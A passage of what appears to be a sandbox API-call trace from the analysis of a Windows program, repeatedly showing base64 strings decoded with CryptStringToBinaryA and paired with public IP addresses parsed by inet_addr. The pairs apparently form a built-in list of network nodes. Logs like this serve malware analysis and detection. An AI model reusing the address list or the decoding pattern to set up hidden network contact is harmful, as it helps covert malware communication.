CryptStringToBinaryA (in: pszString="AHhhedsOZRQUL0TbQWZjhxLzTa4", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.295] malloc (_Size=0x74) returned 0x3d66db0 [0119.295] inet_addr (cp="198.251.87.226") returned 0xe257fbc6 [0119.295] CryptStringToBinaryA (in: pszString="AIUFfBe9LhgJ4oSCXwb5TnL7QYw", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.295] CryptStringToBinaryA (in: pszString="AIUFfBe9LhgJ4oSCXwb5TnL7QYw", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.295] malloc (_Size=0x74) returned 0x3d67630 [0119.295] inet_addr (cp="148.251.75.247") returned 0xf74bfb94 [0119.295] CryptStringToBinaryA (in: pszString="AJYtLdC5vzpq8dXrIBEyOIrKFCQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.295] CryptStringToBinaryA (in: pszString="AJYtLdC5vzpq8dXrIBEyOIrKFCQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.295] malloc (_Size=0x74) returned 0x3d67fb0 [0119.296] inet_addr (cp="5.189.155.39") returned 0x279bbd05 [0119.296] CryptStringToBinaryA (in: pszString="AJhR35M3VLAN3odvzkCIzhtJQME", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.296] CryptStringToBinaryA (in: pszString="AJhR35M3VLAN3odvzkCIzhtJQME", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.296] malloc (_Size=0x74) returned 0x3d67330 [0119.296] inet_addr (cp="84.40.112.70") returned 0x46702854 [0119.296] CryptStringToBinaryA (in: pszString="ALV79hT37TBRBztdRSb/CyOvIXs", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.296] CryptStringToBinaryA (in: pszString="ALV79hT37TBRBztdRSb/CyOvIXs", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.296] malloc (_Size=0x74) returned 0x3d68030 [0119.296] inet_addr (cp="158.174.145.139") returned 0x8b91ae9e [0119.296] CryptStringToBinaryA (in: pszString="ALvLiXpy2Hhg4wWnhP8200DlPRA", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.296] CryptStringToBinaryA (in: pszString="ALvLiXpy2Hhg4wWnhP8200DlPRA", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.296] malloc (_Size=0x74) returned 0x3d674b0 [0119.296] inet_addr (cp="45.66.156.176") returned 0xb09c422d [0119.296] CryptStringToBinaryA (in: pszString="AMItO8GCLrjqOArwQkUzc5nnluI", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.296] CryptStringToBinaryA (in: pszString="AMItO8GCLrjqOArwQkUzc5nnluI", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.296] malloc (_Size=0x74) returned 0x3d67230 [0119.296] inet_addr (cp="62.210.89.9") returned 0x959d23e [0119.297] CryptStringToBinaryA (in: pszString="AMzmqE5tY6GkLhBYObyO1dSxZmk", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.297] CryptStringToBinaryA (in: pszString="AMzmqE5tY6GkLhBYObyO1dSxZmk", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.297] malloc (_Size=0x74) returned 0x3d67430 [0119.297] inet_addr (cp="89.236.112.100") returned 0x6470ec59 [0119.297] CryptStringToBinaryA (in: pszString="ANyurj5UwygJ5/fMS/Km/Gj8VS8", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.297] CryptStringToBinaryA (in: pszString="ANyurj5UwygJ5/fMS/Km/Gj8VS8", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.297] malloc (_Size=0x74) returned 0x3d671b0 [0119.297] inet_addr (cp="199.249.230.144") returned 0x90e6f9c7 [0119.297] CryptStringToBinaryA (in: pszString="AOFknmn/kdfwHnSl5i7xT32ZFeQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.297] CryptStringToBinaryA (in: pszString="AOFknmn/kdfwHnSl5i7xT32ZFeQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.297] malloc (_Size=0x74) returned 0x3d678b0 [0119.297] inet_addr (cp="116.203.50.182") returned 0xb632cb74 [0119.297] CryptStringToBinaryA (in: pszString="AOid3vlEtC/WUvgMJIDV4g3xMZQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.297] CryptStringToBinaryA (in: pszString="AOid3vlEtC/WUvgMJIDV4g3xMZQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.297] malloc (_Size=0x74) returned 0x3d67c30 [0119.297] inet_addr (cp="193.234.225.67") returned 0x43e1eac1 [0119.297] CryptStringToBinaryA (in: pszString="AOs6Esd+cPGfZqe70JTWKWmvNQ0", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.298] CryptStringToBinaryA (in: pszString="AOs6Esd+cPGfZqe70JTWKWmvNQ0", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.298] malloc (_Size=0x74) returned 0x3d670b0 [0119.298] inet_addr (cp="199.249.230.174") returned 0xaee6f9c7 [0119.298] CryptStringToBinaryA (in: pszString="APHyR7ORuEy2wiFyC8v8Df25ERc", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.298] CryptStringToBinaryA (in: pszString="APHyR7ORuEy2wiFyC8v8Df25ERc", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.298] malloc (_Size=0x74) returned 0x3d67bb0 [0119.298] inet_addr (cp="81.169.180.28") returned 0x1cb4a951 [0119.298] CryptStringToBinaryA (in: pszString="AQlwaYSqXhWDbpsgoUQYXdd0QR4", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.298] CryptStringToBinaryA (in: pszString="AQlwaYSqXhWDbpsgoUQYXdd0QR4", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d714b8, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d714b8, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.298] malloc (_Size=0x74) returned 0x3d672b0 [0119.298] inet_addr (cp="34.209.214.211") returned 0xd3d6d122 [0119.298] CryptStringToBinaryA (in: pszString="AQt3KEVEEfSFzinUx5oUU0FRwsQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.298] CryptStringToBinaryA (in: pszString="AQt3KEVEEfSFzinUx5oUU0FRwsQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.298] malloc (_Size=0x74) returned 0x3d67a30 [0119.298] inet_addr (cp="77.123.42.148") returned 0x942a7b4d [0119.298] CryptStringToBinaryA (in: pszString="ARDX1lxXKzbEz03VZLC7sLKr+Y0", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.298] CryptStringToBinaryA (in: pszString="ARDX1lxXKzbEz03VZLC7sLKr+Y0", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d71438, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d71438, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.298] malloc (_Size=0x74) returned 0x3d67930 [0119.299] inet_addr (cp="51.38.69.45") returned 0x2d452633 [0119.299] CryptStringToBinaryA (in: pszString="ARG6m2BGaeY2/9W1A/OCpLetboA", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.299] CryptStringToBinaryA (in: pszString="ARG6m2BGaeY2/9W1A/OCpLetboA", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.299] malloc (_Size=0x74) returned 0x3d67b30 [0119.299] inet_addr (cp="176.10.104.240") returned 0xf0680ab0 [0119.299] CryptStringToBinaryA (in: pszString="ARZo/oJwRT2lNOBopad2OhkLP04", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.299] CryptStringToBinaryA (in: pszString="ARZo/oJwRT2lNOBopad2OhkLP04", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.299] malloc (_Size=0x74) returned 0x3d67ab0 [0119.299] inet_addr (cp="23.88.37.228") returned 0xe4255817 [0119.299] CryptStringToBinaryA (in: pszString="ARgbMb5YYMfWbaiPiK1SLAZHD9k", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.299] CryptStringToBinaryA (in: pszString="ARgbMb5YYMfWbaiPiK1SLAZHD9k", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.299] malloc (_Size=0x74) returned 0x3d677b0 [0119.303] inet_addr (cp="95.143.193.125") returned 0x7dc18f5f [0119.303] CryptStringToBinaryA (in: pszString="ASLlCFQmL8AjIWJxF/hMeFRjre0", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.303] CryptStringToBinaryA (in: pszString="ASLlCFQmL8AjIWJxF/hMeFRjre0", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.303] malloc (_Size=0x74) returned 0x3d67cb0 [0119.303] inet_addr (cp="136.243.65.247") returned 0xf741f388 [0119.303] CryptStringToBinaryA (in: pszString="ATZpawJaxVA4R9c2/p89ZesnpZY", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.303] CryptStringToBinaryA (in: pszString="ATZpawJaxVA4R9c2/p89ZesnpZY", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.303] malloc (_Size=0x74) returned 0x3d67d30 [0119.303] inet_addr (cp="134.209.159.74") returned 0x4a9fd186 [0119.303] CryptStringToBinaryA (in: pszString="AThKXZxtNDUnAb+G0E5fQGyyVq4", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.303] CryptStringToBinaryA (in: pszString="AThKXZxtNDUnAb+G0E5fQGyyVq4", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.303] malloc (_Size=0x74) returned 0x3d673b0 [0119.303] inet_addr (cp="45.9.148.31") returned 0x1f94092d [0119.303] CryptStringToBinaryA (in: pszString="AUvQljY3O3jMKLpw42xxkOPeI2o", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.303] CryptStringToBinaryA (in: pszString="AUvQljY3O3jMKLpw42xxkOPeI2o", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.303] malloc (_Size=0x74) returned 0x3d67db0 [0119.304] inet_addr (cp="192.36.73.207") returned 0xcf4924c0 [0119.304] CryptStringToBinaryA (in: pszString="AU4kwM0h0rmCnoQdXsHTxBX4Zr8", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.304] CryptStringToBinaryA (in: pszString="AU4kwM0h0rmCnoQdXsHTxBX4Zr8", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.304] malloc (_Size=0x74) returned 0x3d67e30 [0119.304] inet_addr (cp="138.201.122.55") returned 0x377ac98a [0119.304] CryptStringToBinaryA (in: pszString="AU7iS8vaFg8jayVHpGObJ+MDoec", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.304] CryptStringToBinaryA (in: pszString="AU7iS8vaFg8jayVHpGObJ+MDoec", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.304] malloc (_Size=0x74) returned 0x3d67530 [0119.304] inet_addr (cp="62.251.89.74") returned 0x4a59fb3e [0119.304] CryptStringToBinaryA (in: pszString="AWCT7kuumvRz/AyBGp0Q/aqco0s", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.304] CryptStringToBinaryA (in: pszString="AWCT7kuumvRz/AyBGp0Q/aqco0s", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.304] malloc (_Size=0x74) returned 0x3d675b0 [0119.304] inet_addr (cp="62.65.106.163") returned 0xa36a413e [0119.304] CryptStringToBinaryA (in: pszString="AWL6ssobf+KG/zWKG0Xh5TFwrW8", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.304] CryptStringToBinaryA (in: pszString="AWL6ssobf+KG/zWKG0Xh5TFwrW8", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.304] malloc (_Size=0x74) returned 0x3d67eb0 [0119.304] inet_addr (cp="95.79.25.190") returned 0xbe194f5f [0119.305] CryptStringToBinaryA (in: pszString="AWZNQagfgXo+cUANa/1AlHqkCvs", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.305] CryptStringToBinaryA (in: pszString="AWZNQagfgXo+cUANa/1AlHqkCvs", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.305] malloc (_Size=0x74) returned 0x3d676b0 [0119.305] inet_addr (cp="216.127.173.78") returned 0x4ead7fd8 [0119.305] CryptStringToBinaryA (in: pszString="AWpUU8K5HJX3z7FAjA1/z0XAunU", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.305] CryptStringToBinaryA (in: pszString="AWpUU8K5HJX3z7FAjA1/z0XAunU", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.305] malloc (_Size=0x74) returned 0x3d67f30 [0119.305] inet_addr (cp="31.220.1.233") returned 0xe901dc1f [0119.305] CryptStringToBinaryA (in: pszString="AXIqYNwOqmTXkFrWCjJCxgkec9E", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.305] CryptStringToBinaryA (in: pszString="AXIqYNwOqmTXkFrWCjJCxgkec9E", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.305] malloc (_Size=0x74) returned 0x3d67130 [0119.305] inet_addr (cp="185.112.146.155") returned 0x9b9270b9 [0119.305] CryptStringToBinaryA (in: pszString="AXKfEKgd3YqS13CyEzCC61bHXiY", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.305] CryptStringToBinaryA (in: pszString="AXKfEKgd3YqS13CyEzCC61bHXiY", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.305] malloc (_Size=0x74) returned 0x3d67730 [0119.305] inet_addr (cp="178.17.170.135") returned 0x87aa11b2 [0119.306] CryptStringToBinaryA (in: pszString="AXOnqLqdMgQ2QbaXJtMqmt/ibRY", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.306] CryptStringToBinaryA (in: pszString="AXOnqLqdMgQ2QbaXJtMqmt/ibRY", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.306] malloc (_Size=0x74) returned 0x3d67830 [0119.306] inet_addr (cp="93.174.93.133") returned 0x855dae5d [0119.306] CryptStringToBinaryA (in: pszString="AXsIzBY0JM1qukrdQEK0F01JRzI", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.306] CryptStringToBinaryA (in: pszString="AXsIzBY0JM1qukrdQEK0F01JRzI", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.306] malloc (_Size=0x74) returned 0x3d679b0 [0119.306] inet_addr (cp="185.21.217.32") returned 0x20d915b9 [0119.306] CryptStringToBinaryA (in: pszString="AY3Zw6DSrQ/8rjl42JQYwbiLgdU", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.306] CryptStringToBinaryA (in: pszString="AY3Zw6DSrQ/8rjl42JQYwbiLgdU", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.306] malloc (_Size=0x74) returned 0x3d683b0 [0119.306] inet_addr (cp="142.4.213.12") returned 0xcd5048e [0119.306] CryptStringToBinaryA (in: pszString="AZgfCa8I6x7Gn5GzHYm2x2dXYgo", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.306] CryptStringToBinaryA (in: pszString="AZgfCa8I6x7Gn5GzHYm2x2dXYgo", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.306] malloc (_Size=0x74) returned 0x3d68db0 [0119.306] inet_addr (cp="54.36.112.244") returned 0xf4702436 [0119.306] CryptStringToBinaryA (in: pszString="AZg55mxyKQOTZ7606Dsn0IqcKzc", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.306] CryptStringToBinaryA (in: pszString="AZg55mxyKQOTZ7606Dsn0IqcKzc", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.307] malloc (_Size=0x74) returned 0x3d689b0 [0119.307] inet_addr (cp="51.91.101.143") returned 0x8f655b33 [0119.307] CryptStringToBinaryA (in: pszString="AZ4g41JIG9RaPOfWaRoQ+1MYUPs", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.307] CryptStringToBinaryA (in: pszString="AZ4g41JIG9RaPOfWaRoQ+1MYUPs", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.307] malloc (_Size=0x74) 